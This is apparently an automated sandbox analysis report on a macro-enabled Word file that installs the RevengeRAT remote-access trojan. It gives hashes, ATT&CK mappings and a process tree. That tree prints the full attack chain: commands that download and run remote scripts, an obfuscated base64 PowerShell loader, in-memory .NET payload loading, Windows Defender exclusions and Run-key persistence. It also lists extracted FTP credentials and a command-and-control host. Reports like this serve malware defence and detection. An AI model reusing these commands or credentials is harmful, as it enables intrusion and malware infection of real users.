revengerat | 27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696

Resubmissions

24-09-2024 02:47

240924-dab1nasfnm 10

24-09-2024 01:10

240924-bjndya1hrj 10

Analysis

max time kernel
137s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
24-09-2024 01:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm
Size

124KB
MD5

cc0f9cc1f9133b0f5dd045a34b2d7ae1
SHA1

c41f1c79442c0e2b717473f9c40d395176afffdb
SHA256

27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696
SHA512

154c2ddc43ba72e1f166dc025e20ef5c580e1f490f1828496c1f10f8ef17b4432137740c66552d12cb647499e9ad7d5a62e5ab709ed2bcd9d08d2416b475c3da
SSDEEP

1536:vkc9anle9tQVTGH7gPgP8MDw/jlQx1JE7vReOr0l77CXXNaHsdUXSIt98iuBXFtc:vVWqQVtClwH9r0l77AnsSmy/BVtqxp

Score

10^/10

revengerat nyancatrevenge defense_evasion discovery execution persistence trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Extracted

Credentials

Protocol: ftp
Host:
ftp.desckvbrat.com.br
Port:
21
Username:
desckvbrat1
Password:
developerpro21578Jp@@

Extracted

Family

revengerat

Botnet

NyanCatRevenge

marcelotatuape.ddns.net:333

Mutex

b25e533944db469

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	220	2664	powershell.exe	83

RevengeRAT
Remote-access trojan with a wide range of capabilities.
trojan revengerat

Blocklisted process makes network request 9 IoCs

flow	pid	Process
51	220	powershell.exe
53	220	powershell.exe
57	3100	powershell.exe
58	3100	powershell.exe
61	3100	powershell.exe
64	3100	powershell.exe
66	3100	powershell.exe
67	3100	powershell.exe
70	4000	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2816	powershell.exe
4012	powershell.exe
4048	powershell.exe
4000	powershell.exe
4236	powershell.exe
3100	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	WScript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_mdw = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman \". 'C:\\Users\\Admin\\AppData\\Local\\Microsoft\\LocalLow\\System Update\\yhfgy.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
69	pastebin.com
70	pastebin.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4000 set thread context of 4708	4000	powershell.exe	108

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2664	WINWORD.EXE
2664	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
220	powershell.exe
220	powershell.exe
4236	powershell.exe
4236	powershell.exe
3100	powershell.exe
3100	powershell.exe
3100	powershell.exe
4012	powershell.exe
2816	powershell.exe
4012	powershell.exe
2816	powershell.exe
4048	powershell.exe
4048	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe
4000	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	220	powershell.exe
Token: SeDebugPrivilege	4236	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeDebugPrivilege	4048	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe

Suspicious use of SetWindowsHookEx 7 IoCs

pid	Process
2664	WINWORD.EXE
2664	WINWORD.EXE
2664	WINWORD.EXE
2664	WINWORD.EXE
2664	WINWORD.EXE
2664	WINWORD.EXE
2664	WINWORD.EXE

Suspicious use of WriteProcessMemory 31 IoCs

description	pid	Process	procid_target
PID 2664 wrote to memory of 220	2664	WINWORD.EXE	93
PID 2664 wrote to memory of 220	2664	WINWORD.EXE	93
PID 220 wrote to memory of 5068	220	powershell.exe	96
PID 220 wrote to memory of 5068	220	powershell.exe	96
PID 4980 wrote to memory of 4192	4980	explorer.exe	98
PID 4980 wrote to memory of 4192	4980	explorer.exe	98
PID 4192 wrote to memory of 4236	4192	WScript.exe	99
PID 4192 wrote to memory of 4236	4192	WScript.exe	99
PID 4236 wrote to memory of 3100	4236	powershell.exe	101
PID 4236 wrote to memory of 3100	4236	powershell.exe	101
PID 3100 wrote to memory of 4012	3100	powershell.exe	102
PID 3100 wrote to memory of 4012	3100	powershell.exe	102
PID 3100 wrote to memory of 2816	3100	powershell.exe	103
PID 3100 wrote to memory of 2816	3100	powershell.exe	103
PID 3100 wrote to memory of 4048	3100	powershell.exe	104
PID 3100 wrote to memory of 4048	3100	powershell.exe	104
PID 3100 wrote to memory of 4000	3100	powershell.exe	105
PID 3100 wrote to memory of 4000	3100	powershell.exe	105
PID 3100 wrote to memory of 1552	3100	powershell.exe	106
PID 3100 wrote to memory of 1552	3100	powershell.exe	106
PID 4000 wrote to memory of 1616	4000	powershell.exe	107
PID 4000 wrote to memory of 1616	4000	powershell.exe	107
PID 4000 wrote to memory of 1616	4000	powershell.exe	107
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108
PID 4000 wrote to memory of 4708	4000	powershell.exe	108

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\27e17bc7efc2513c75ecc1d8dac97187ca4b3f6d6aa2113e814e66ea5d2cb696.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2664
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wget https://www.4sync.com/web/directDownload/CE3CTlT9/DlRvs8N_.dc5ccedf8d8817fc5fe4f69239307383 -o test.js; explorer.exe test.js
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\explorer.exe
    "C:\Windows\explorer.exe" test.js
    3⤵
    PID:5068

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:4980
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\test.js"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:4192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $fLbjh = 'JA㍿pAFUAbg㍿KAGEAIAA9ACAAJA㍿oAG8Acw㍿0AC4AVg㍿lAHIAcw㍿pAG8AbgAuAE0AYQ㍿qAG8AcgAuAEUAcQ㍿1AGEAbA㍿zACgAMgApADsASQ㍿mACAAKAAgACQAaQ㍿VAG4ASg㍿hACAAKQAgAHsAJA㍿NAGkAUg㍿JAGQAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAEkATwAuAFAAYQ㍿0AGgAXQA6ADoARw㍿lAHQAVA㍿lAG0AcA㍿QAGEAdA㍿oACgAKQA7AGQAZQ㍿sACAAKAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApADsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAJw㍿oAHQAdA㍿wAHMAOgAvAC8AZA㍿yAGkAdg㍿lAC4AZw㍿vAG8AZw㍿sAGUALg㍿jAG8AbQAvAHUAYwA/AGUAeA㍿wAG8Acg㍿0AD0AZA㍿vAHcAbg㍿sAG8AYQ㍿kACYAaQ㍿kAD0AJwA7ACQAcw㍿CAGkAaQ㍿XACAAPQAgACQAZQ㍿uAHYAOg㍿QAFIATw㍿DAEUAUw㍿TAE8AUg㍿fAEEAUg㍿DAEgASQ㍿UAEUAQw㍿UAFUAUg㍿FAC4AQw㍿vAG4AdA㍿hAGkAbg㍿zACgAJwA2ADQAJwApADsAaQ㍿mACAAKAAgACQAcw㍿CAGkAaQ㍿XACAAKQAgAHsAJA㍿SAFkARQ㍿hAEYAIAA9ACAAKAAkAFIAWQ㍿FAGEARgAgACsAIAAnADEATg㍿hAHEAZA㍿OAFgAaQ㍿HAHYASQ㍿fAHEAMQ㍿SAFAAaw㍿hAHoARg㍿0AE0AeQ㍿nAG0AYQ㍿xAFQASg㍿YAHUANAAyACcAKQAgADsAfQ㍿lAGwAcw㍿lACAAewAkAFIAWQ㍿FAGEARgAgAD0AIAAoACQAUg㍿ZAEUAYQ㍿GACAAKwAgACcAMQ㍿nADEAag㍿tAFgAdQ㍿zAFgAOQ㍿tAGMAOQ㍿WAG0AaA㍿WAHIASg㍿KADIAWA㍿vAGYAWgAzAGEASw㍿fAGMATA㍿PAHQAJwApACAAOw㍿9ADsAJA㍿JAGEAbw㍿NAGkAIAA9ACAAKAAgAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACAAKQAgADsAJA㍿JAGEAbw㍿NAGkALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAAgADsAJA㍿JAGEAbw㍿NAGkALg㍿EAG8Adw㍿uAGwAbw㍿hAGQARg㍿pAGwAZQAoACQAVQ㍿SAEwASw㍿CACwAIAAkAE0AaQ㍿SAEkAZAAgACsAIAAnAFwAVQ㍿wAHcAaQ㍿uAC4AbQ㍿zAHUAJwApACAAOwAkAEEAVQ㍿yAEcARgAgAD0AIAAoACAAJw㍿DADoAXA㍿VAHMAZQ㍿yAHMAXAAnACAAKwAgAFsARQ㍿uAHYAaQ㍿yAG8Abg㍿tAGUAbg㍿0AF0AOgA6AFUAcw㍿lAHIATg㍿hAG0AZQAgACkAOw㍿JAHoAag㍿㍿AFEAIAA9ACAAKAAgACQATQ㍿pAFIASQ㍿kACAAKwAgACcAXA㍿VAHAAdw㍿pAG4ALg㍿tAHMAdQAnACAAKQAgADsAIA㍿wAG8Adw㍿lAHIAcw㍿oAGUAbA㍿sAC4AZQ㍿4AGUAIA㍿3AHUAcw㍿hAC4AZQ㍿4AGUAIA㍿JAHoAag㍿㍿AFEAIAAvAHEAdQ㍿pAGUAdAAgAC8Abg㍿vAHIAZQ㍿zAHQAYQ㍿yAHQAIAA7ACAAQw㍿vAHAAeQAtAEkAdA㍿lAG0AIAAnACUARA㍿DAFAASg㍿VACUAJwAgAC0ARA㍿lAHMAdA㍿pAG4AYQ㍿0AGkAbw㍿uACAAKAAgACQAQQ㍿VAHIARw㍿GACAAKwAgACcAXA㍿㍿AHAAcA㍿EAGEAdA㍿hAFwAUg㍿vAGEAbQ㍿pAG4AZw㍿cAE0AaQ㍿jAHIAbw㍿zAG8AZg㍿0AFwAVw㍿pAG4AZA㍿vAHcAcw㍿cAFMAdA㍿hAHIAdAAgAE0AZQ㍿uAHUAXA㍿QAHIAbw㍿nAHIAYQ㍿tAHMAXA㍿TAHQAYQ㍿yAHQAdQ㍿wACcAIAApACAALQ㍿mAG8Acg㍿jAGUAIAA7AHAAbw㍿3AGUAcg㍿zAGgAZQ㍿sAGwALg㍿lAHgAZQAgAC0AYw㍿vAG0AbQ㍿hAG4AZAAgACcAcw㍿sAGUAZQ㍿wACAAMQA4ADAAJwA7ACAAcw㍿oAHUAdA㍿kAG8Adw㍿uAC4AZQ㍿4AGUAIAAvAHIAIAAvAHQAIAAwACAALw㍿mACAAfQ㍿lAGwAcw㍿lACAAew㍿bAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿TAGUAcg㍿2AGkAYw㍿lAFAAbw㍿pAG4AdA㍿NAGEAbg㍿hAGcAZQ㍿yAF0AOgA6AFMAZQ㍿yAHYAZQ㍿yAEMAZQ㍿yAHQAaQ㍿mAGkAYw㍿hAHQAZQ㍿WAGEAbA㍿pAGQAYQ㍿0AGkAbw㍿uAEMAYQ㍿sAGwAYg㍿hAGMAawAgAD0AIA㍿7ACQAdA㍿yAHUAZQ㍿9ADsAWw㍿TAHkAcw㍿0AGUAbQAuAE4AZQ㍿0AC4AUw㍿lAHIAdg㍿pAGMAZQ㍿QAG8AaQ㍿uAHQATQ㍿hAG4AYQ㍿nAGUAcg㍿dADoAOg㍿TAGUAYw㍿1AHIAaQ㍿0AHkAUA㍿yAG8AdA㍿vAGMAbw㍿sACAAPQAgAFsAUw㍿5AHMAdA㍿lAG0ALg㍿OAGUAdAAuAFMAZQ㍿jAHUAcg㍿pAHQAeQ㍿QAHIAbw㍿0AG8AYw㍿vAGwAVA㍿5AHAAZQ㍿dADoAOg㍿UAGwAcwAxADIAOwAkAFIAeg㍿XAFcAcgAgAD0AIAAoAE4AZQ㍿3AC0ATw㍿iAGoAZQ㍿jAHQAIA㍿OAGUAdAAuAFcAZQ㍿iAEMAbA㍿pAGUAbg㍿0ACkAOwAkAFIAeg㍿XAFcAcgAuAEUAbg㍿jAG8AZA㍿pAG4AZwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AVA㍿lAHgAdAAuAEUAbg㍿jAG8AZA㍿pAG4AZw㍿dADoAOg㍿VAFQARgA4ADsAJA㍿SAHoAVw㍿XAHIALg㍿DAHIAZQ㍿kAGUAbg㍿0AGkAYQ㍿sAHMAIAA9ACAAbg㍿lAHcALQ㍿vAGIAag㍿lAGMAdAAgAFMAeQ㍿zAHQAZQ㍿tAC4ATg㍿lAHQALg㍿OAGUAdA㍿3AG8Acg㍿rAEMAcg㍿lAGQAZQ㍿uAHQAaQ㍿hAGwAKAAnAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQAMQAnACwAJw㍿kAGUAdg㍿lAGwAbw㍿wAGUAcg㍿wAHIAbwAyADEANQA3ADgASg㍿wAEAAQAAnACkAOwAkAFYAdA㍿hAEEARgAgAD0AIAAkAFIAeg㍿XAFcAcgAuAEQAbw㍿3AG4AbA㍿vAGEAZA㍿TAHQAcg㍿pAG4AZwAoACAAJw㍿mAHQAcAA6AC8ALw㍿kAGUAcw㍿jAGsAdg㍿iAHIAYQ㍿0ADEAQA㍿mAHQAcAAuAGQAZQ㍿zAGMAaw㍿2AGIAcg㍿hAHQALg㍿jAG8AbQAuAGIAcgAvAFUAcA㍿jAHIAeQ㍿wAHQAZQ㍿yAC8AMAAyAC8ARA㍿MAEwAMAAxAC4AdA㍿4AHQAJwAgACkAOwAkAFIAeg㍿XAFcAcgAuAGQAaQ㍿zAHAAbw㍿zAGUAKAApADsAJA㍿SAHoAVw㍿XAHIAIAA9ACAAKA㍿OAGUAdwAtAE8AYg㍿qAGUAYw㍿0ACAATg㍿lAHQALg㍿XAGUAYg㍿DAGwAaQ㍿lAG4AdAApADsAJA㍿SAHoAVw㍿XAHIALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAIAA9ACAAWw㍿TAHkAcw㍿0AGUAbQAuAFQAZQ㍿4AHQALg㍿FAG4AYw㍿vAGQAaQ㍿uAGcAXQA6ADoAVQ㍿UAEYAOAA7ACQAVg㍿0AGEAQQ㍿GACAAPQAgACQAUg㍿6AFcAVw㍿yAC4ARA㍿vAHcAbg㍿sAG8AYQ㍿kAFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAgACkAOw㍿bAEIAeQ㍿0AGUAWw㍿dAF0AIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgAD0AIA㍿bAFMAeQ㍿zAHQAZQ㍿tAC4AQw㍿vAG4Adg㍿lAHIAdA㍿dADoAOg㍿GAHIAbw㍿tAEIAYQ㍿zAGUANgA0AFMAdA㍿yAGkAbg㍿nACgAIAAkAFYAdA㍿hAEEARgAuAFIAZQ㍿wAGwAYQ㍿jAGUAKAAgACcAkyE6AJMhJwAgACwAIAAnAEEAJwAgACkAIAApADsAWw㍿TAHkAcw㍿0AGUAbQAuAEEAcA㍿wAEQAbw㍿tAGEAaQ㍿uAF0AOgA6AEMAdQ㍿yAHIAZQ㍿uAHQARA㍿vAG0AYQ㍿pAG4ALg㍿MAG8AYQ㍿kACgAIAAkAFIAWA㍿pAFYAag㍿fAFkAbA㍿0AEgASwAgACkALg㍿HAGUAdA㍿UAHkAcA㍿lACgAIAAnAEMAbA㍿hAHMAcw㍿MAGkAYg㍿yAGEAcg㍿5ADMALg㍿DAGwAYQ㍿zAHMAMQAnACAAKQAuAEcAZQ㍿0AE0AZQ㍿0AGgAbw㍿kACgAIAAnAHAAcg㍿GAFYASQAnACAAKQAuAEkAbg㍿2AG8Aaw㍿lACgAJA㍿uAHUAbA㍿sACwAIA㍿bAG8AYg㍿qAGUAYw㍿0AFsAXQ㍿dACAAKAAgACcAMgAyACUAOQA2AGMAOAA1ADMANgA1ADYAYgAwADYAYQA1ADYAOA㍿kAGIAMg㍿jADIAMQ㍿hAGUANg㍿jAGIAYgAyADEANQ㍿iADIAMgAlAD0AdgAmAGQAYQ㍿vAGwAbg㍿3AG8AZAA9AGUAYw㍿yAHUAbw㍿zACYAdA㍿4AHQALg㍿0AHgAdAA3ADIAJQA3ADIAJQA4AC0ARg㍿UAFUARAAzACUAQQAyACUAZQ㍿tAGEAbg㍿lAGwAaQ㍿mACsAQgAzACUAMgAyACUAdA㍿4AHQALg㍿0AHgAdAAyADIAJQ㍿EADMAJQ㍿lAG0AYQ㍿uAGUAbA㍿pAGYAKw㍿CADMAJQ㍿0AG4AZQ㍿tAGgAYw㍿hAHQAdA㍿hAD0Abg㍿vAGkAdA㍿pAHMAbw㍿wAHMAaQ㍿kAC0AdA㍿uAGUAdA㍿uAG8AYwAtAGUAcw㍿uAG8AcA㍿zAGUAcgA/AHQAeA㍿0AC4AYwA4ADgANgA3ADAANQAwADAANAA1AGMALQAwAGMANw㍿hAC0AMgA4ADkANAAtAGIAMg㍿hADIALQA2ADMAOQAxAGUAZAAyAGQALw㍿nAHAARQ㍿XAEoAdQ㍿RAHgALw㍿zAG0AZQ㍿0AGkALw㍿tAG8AYwAuAHQAaA㍿nAGkAegAuAG4AZA㍿jAC4AMA㍿uAC4AMQ㍿yAHQALgA3AHAALwAvADoAcw㍿wAHQAdA㍿oACcAIAAsACAAJwAlAEQAQw㍿QAEoAVQAlACcALAAgACcAdA㍿yAHUAZQAxACcAIAApACAAKQA7AH0AOwA=';$fLbjh = $fLbjh.replace('㍿','B') ;$fLbjh = [System.Convert]::FromBase64String( $fLbjh ) ;;;$fLbjh = [System.Text.Encoding]::Unicode.GetString( $fLbjh ) ;$fLbjh = $fLbjh.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\test.js') ;powershell $fLbjh
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4236
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$iUnJa = $host.Version.Major.Equals(2);If ( $iUnJa ) {$MiRId = [System.IO.Path]::GetTempPath();del ($MiRId + '\Upwin.msu');$RYEaF = 'https://drive.google.com/uc?export=download&id=';$sBiiW = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $sBiiW ) {$RYEaF = ($RYEaF + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$RYEaF = ($RYEaF + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$IaoMi = ( New-Object Net.WebClient ) ;$IaoMi.Encoding = [System.Text.Encoding]::UTF8 ;$IaoMi.DownloadFile($URLKB, $MiRId + '\Upwin.msu') ;$AUrGF = ( 'C:\Users\' + [Environment]::UserName );IzjAQ = ( $MiRId + '\Upwin.msu' ) ; powershell.exe wusa.exe IzjAQ /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\test.js' -Destination ( $AUrGF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$RzWWr.Credentials = new-object System.Net.NetworkCredential('desckvbrat1','developerpro21578Jp@@');$VtaAF = $RzWWr.DownloadString( 'ftp://[email protected]/Upcrypter/02/DLL01.txt' );$RzWWr.dispose();$RzWWr = (New-Object Net.WebClient);$RzWWr.Encoding = [System.Text.Encoding]::UTF8;$VtaAF = $RzWWr.DownloadString( $VtaAF );[Byte[]] $RXiVj_YltHK = [System.Convert]::FromBase64String( $VtaAF.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $RXiVj_YltHK ).GetType( 'ClassLibrary3.Class1' ).GetMethod( 'prFVI' ).Invoke($null, [object[]] ( '22%96c853656b06a568db2c21ae6cbb215b22%=v&daolnwod=ecruos&txt.txt72%72%8-FTUD3%A2%emanelif+B3%22%txt.txt22%D3%emanelif+B3%tnemhcatta=noitisopsid-tnetnoc-esnopser?txt.c8867050045c-0c7a-2894-b2a2-6391ed2d/gpEWJuQx/smeti/moc.thgiz.ndc.0n.1rt.7p//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\test.js', 'true1' ) );};"
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3100
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4012
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -file "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4048
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\yhfgy.ps1"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4000
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:1616
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4708
    - - C:\Windows\system32\cmd.exe
        
        cmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\test.js"
        5⤵
        
        PID:1552

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\x2.ps1

Filesize
336B

MD5
818546b40619c0d2ec72fd0f5d9df2d0

SHA1
b3ac5ec4ccaee32ada9beb66e137f84502cf9591

SHA256
8b97e60593d389dae88031cbb601eb3e78852d7d7a8c805b7e69d6be6929417a

SHA512
ef185caf51a109566a53d93c0d1b9ea75517311ebc251955fdebd56f4f47bd8c61332b23738e13e3fa91aff838e44d5ea16e532e75848bff82ce4bee499fd5f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\LocalLow\System Update\yhfgy.ps1

Filesize
132KB

MD5
5d6acf998701782dbc41e3cca20839ae

SHA1
8fa365fd0df099df35d06bc9178d435ad2a9f472

SHA256
e9732ebc6fee2eee5b41a6ab019c68acf833204545cfe8e51b9f5df910e9c40f

SHA512
